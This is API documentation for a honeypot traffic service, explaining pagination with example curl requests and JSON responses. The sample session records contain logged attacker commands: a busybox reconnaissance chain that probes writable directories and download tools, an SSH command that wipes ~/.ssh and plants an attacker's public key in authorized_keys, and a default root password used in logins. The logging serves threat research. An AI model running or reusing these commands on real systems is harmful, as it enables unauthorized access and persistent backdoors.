The Unwanted Traffic API supports pagination for endpoints that return large datasets, specifically /sessions, /attempts, and /malware. This page explains how to use pagination parameters to navigate through results efficiently.
Pagination is controlled using two query parameters:
limit: The maximum number of records to return in a single response (default: 50, maximum: 100).offset: The number of records to skip before returning results (default: 0).These parameters allow you to retrieve data in manageable chunks, especially when combined with filters (see Filters).
Paginated endpoints include a pagination object in the response, which provides metadata about the result set:
limit: The number of records returned in the current response.offset: The starting index of the returned records.totalRecords: The total number of records matching the query (after applying filters).The data array contains the actual records, up to the specified limit.
To retrieve the first 2 sessions where the destination IP is "192.168.0.96":
Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" "https://defrancisco.us/unwanted-traffic/sessions?dst-ip=192.168.0.96&limit=2&offset=0"Example Response:
{
"status": "success",
"data": [
{
"attempts": [
{
"attempt_credentials": "root||xc3511",
"attempt_id": 1,
"attempt_login": "true",
"attempt_password": "xc3511",
"attempt_session": "2a58f17a436b",
"attempt_username": "root"
}
],
"commands": "sh; shell; enable; system; ping ;sh; >/usr/.a && cd /usr/; rm -rf .a; >/mnt/.a && cd /mnt/; rm -rf .a; >/var/run/.a && cd /var/run/; rm -rf .a; >/dev/shm/.a && cd /dev/shm/; rm -rf .a; >/etc/.a && cd /etc/; rm -rf .a; >/var/.a && cd /var/; rm -rf .a; >/tmp/.a && cd /tmp/; rm -rf .a; >/dev/.a && cd /dev/; rm -rf .a; >/var/home/user/fw/.a && cd /var/home/user/fw/; rm -rf .a; for i in `cat /proc/mounts|grep tmpfs|grep -v noexec|cut -d ' ' -f 2`; do >$i/.a && cd $i;done; cat /proc/mounts | grep tmpfs | grep -v noexec | cut -d -f 2; /bin/busybox wget --help; /bin/busybox ftpget --help; /bin/busybox echo -e '\\\\x67\\\\x61\\\\x79\\\\x66\\\\x67\\\\x74';",
"dst_asn": 7922,
"dst_country": "United States",
"dst_ip": "192.168.0.96",
"dst_port": 2723,
"duration": 1.23172,
"malware": [],
"protocol": "telnet",
"sensor": "raspberrypi",
"session": "2a58f17a436b",
"session_id": 1,
"src_asn": 4766,
"src_country": "South Korea",
"src_ip": "192.168.1.100",
"src_port": 61248,
"timestamp": "Sun, 23 Feb 2025 00:00:01 GMT",
"traffic_type": "attack"
},
{
"attempts": [
{
"attempt_credentials": "root||xc3511",
"attempt_id": 2,
"attempt_login": "true",
"attempt_password": "xc3511",
"attempt_session": "818fa72b39c1",
"attempt_username": "root"
}
],
"commands": "sh; shell; enable; system; ping ;sh; >/usr/.a && cd /usr/; rm -rf .a; >/mnt/.a && cd /mnt/; rm -rf .a; >/var/run/.a && cd /var/run/; rm -rf .a; >/dev/shm/.a && cd /dev/shm/; rm -rf .a; >/etc/.a && cd /etc/; rm -rf .a; >/var/.a && cd /var/; rm -rf .a; >/tmp/.a && cd /tmp/; rm -rf .a; >/dev/.a && cd /dev/; rm -rf .a; >/var/home/user/fw/.a && cd /var/home/user/fw/; rm -rf .a; for i in `cat /proc/mounts|grep tmpfs|grep -v noexec|cut -d ' ' -f 2`; do >$i/.a && cd $i;done; cat /proc/mounts | grep tmpfs | grep -v noexec | cut -d -f 2; /bin/busybox wget --help; /bin/busybox ftpget --help; /bin/busybox echo -e '\\\\x67\\\\x61\\\\x79\\\\x66\\\\x67\\\\x74';",
"dst_asn": 7922,
"dst_country": "United States",
"dst_ip": "192.168.0.96",
"dst_port": 2723,
"duration": 1.20777,
"malware": [],
"protocol": "telnet",
"sensor": "raspberrypi",
"session": "818fa72b39c1",
"session_id": 2,
"src_asn": 4766,
"src_country": "South Korea",
"src_ip": "192.168.1.100",
"src_port": 61254,
"timestamp": "Sun, 23 Feb 2025 00:00:02 GMT",
"traffic_type": "attack"
}
],
"pagination": {
"limit": 2,
"offset": 0,
"totalRecords": 9607
}
}To retrieve the next 2 sessions (records 3 and 4):
Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" "https://defrancisco.us/unwanted-traffic/sessions?dst-ip=192.168.0.96&limit=2&offset=2"Example Response:
{
"status": "success",
"data": [
{
"attempts": [
{
"attempt_credentials": "root||xc3511",
"attempt_id": 3,
"attempt_login": "true",
"attempt_password": "xc3511",
"attempt_session": "9c2d4e8f127a",
"attempt_username": "root"
}
],
"commands": "sh; shell; enable; system; ping ;sh; >/usr/.a && cd /usr/; rm -rf .a; >/mnt/.a && cd /mnt/; rm -rf .a; >/var/run/.a && cd /var/run/; rm -rf .a; >/dev/shm/.a && cd /dev/shm/; rm -rf .a; >/etc/.a && cd /etc/; rm -rf .a; >/var/.a && cd /var/; rm -rf .a; >/tmp/.a && cd /tmp/; rm -rf .a; >/dev/.a && cd /dev/; rm -rf .a; >/var/home/user/fw/.a && cd /var/home/user/fw/; rm -rf .a; for i in `cat /proc/mounts|grep tmpfs|grep -v noexec|cut -d ' ' -f 2`; do >$i/.a && cd $i;done; cat /proc/mounts | grep tmpfs | grep -v noexec | cut -d -f 2; /bin/busybox wget --help; /bin/busybox ftpget --help; /bin/busybox echo -e '\\\\x67\\\\x61\\\\x79\\\\x66\\\\x67\\\\x74';",
"dst_asn": 7922,
"dst_country": "United States",
"dst_ip": "192.168.0.96",
"dst_port": 2723,
"duration": 1.19543,
"malware": [],
"protocol": "telnet",
"sensor": "raspberrypi",
"session": "9c2d4e8f127a",
"session_id": 3,
"src_asn": 4766,
"src_country": "South Korea",
"src_ip": "192.168.1.100",
"src_port": 61260,
"timestamp": "Sun, 23 Feb 2025 00:00:03 GMT",
"traffic_type": "attack"
},
{
"attempts": [
{
"attempt_credentials": "root||xc3511",
"attempt_id": 4,
"attempt_login": "true",
"attempt_password": "xc3511",
"attempt_session": "3f9a2c6b850d",
"attempt_username": "root"
}
],
"commands": "sh; shell; enable; system; ping ;sh; >/usr/.a && cd /usr/; rm -rf .a; >/mnt/.a && cd /mnt/; rm -rf .a; >/var/run/.a && cd /var/run/; rm -rf .a; >/dev/shm/.a && cd /dev/shm/; rm -rf .a; >/etc/.a && cd /etc/; rm -rf .a; >/var/.a && cd /var/; rm -rf .a; >/tmp/.a && cd /tmp/; rm -rf .a; >/dev/.a && cd /dev/; rm -rf .a; >/var/home/user/fw/.a && cd /var/home/user/fw/; rm -rf .a; for i in `cat /proc/mounts|grep tmpfs|grep -v noexec|cut -d ' ' -f 2`; do >$i/.a && cd $i;done; cat /proc/mounts | grep tmpfs | grep -v noexec | cut -d -f 2; /bin/busybox wget --help; /bin/busybox ftpget --help; /bin/busybox echo -e '\\\\x67\\\\x61\\\\x79\\\\x66\\\\x67\\\\x74';",
"dst_asn": 7922,
"dst_country": "United States",
"dst_ip": "192.168.0.96",
"dst_port": 2723,
"duration": 1.20219,
"malware": [],
"protocol": "telnet",
"sensor": "raspberrypi",
"session": "3f9a2c6b850d",
"session_id": 4,
"src_asn": 4766,
"src_country": "South Korea",
"src_ip": "192.168.1.100",
"src_port": 61266,
"timestamp": "Sun, 23 Feb 2025 00:00:04 GMT",
"traffic_type": "attack"
}
],
"pagination": {
"limit": 2,
"offset": 2,
"totalRecords": 9607
}
}To retrieve the second page of malware records (records 3 and 4) where the malware type is "redir" and the source IP is "192.168.1.100":
Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" "https://defrancisco.us/unwanted-traffic/malware?malware-type=redir&src-ip=192.168.1.100&limit=2&offset=2"Example Response:
{
"status": "success",
"data": [
{
"malware_hash": "a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2",
"malware_id": 3,
"malware_session": "7b4f9a3c1e2d",
"malware_site": "",
"malware_type": "redir",
"sessions": {
"commands": "cd ~; chattr -ia .ssh; lockr -ia .ssh; cd ~ && rm -rf .ssh && mkdir .ssh && echo \\\"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\\\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"dst_asn": 7922,
"dst_country": "United States",
"dst_ip": "192.168.0.96",
"dst_port": 2722,
"duration": 6.23456,
"protocol": "ssh",
"sensor": "raspberrypi",
"session": "7b4f9a3c1e2d",
"session_id": 789,
"src_asn": 142002,
"src_country": "India",
"src_ip": "192.168.1.100",
"src_port": 52345,
"timestamp": "Sun, 23 Feb 2025 03:15:22 GMT",
"traffic_type": "attack"
}
},
{
"malware_hash": "a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2",
"malware_id": 4,
"malware_session": "9d2c5b7e4f1a",
"malware_site": "",
"malware_type": "redir",
"sessions": {
"commands": "cd ~; chattr -ia .ssh; lockr -ia .ssh; cd ~ && rm -rf .ssh && mkdir .ssh && echo \\\"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\\\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"dst_asn": 7922,
"dst_country": "United States",
"dst_ip": "192.168.0.96",
"dst_port": 2722,
"duration": 4.98765,
"protocol": "ssh",
"sensor": "raspberrypi",
"session": "9d2c5b7e4f1a",
"session_id": 823,
"src_asn": 396982,
"src_country": "Taiwan",
"src_ip": "192.168.1.100",
"src_port": 58912,
"timestamp": "Sun, 23 Feb 2025 03:20:47 GMT",
"traffic_type": "attack"
}
}
],
"pagination": {
"limit": 2,
"offset": 2,
"totalRecords": 678
}
}To effectively use pagination:
limit to control the number of records per request, keeping it reasonable (e.g., 10–50) to balance performance and usability.offset by limit to retrieve subsequent pages (e.g., offset=0, offset=50, offset=100 for limit=50).totalRecords to determine how many pages are available (ceil(totalRecords / limit)).limit values to prevent performance issues; the API caps limit at 100.data arrays gracefully when offset exceeds the number of available records.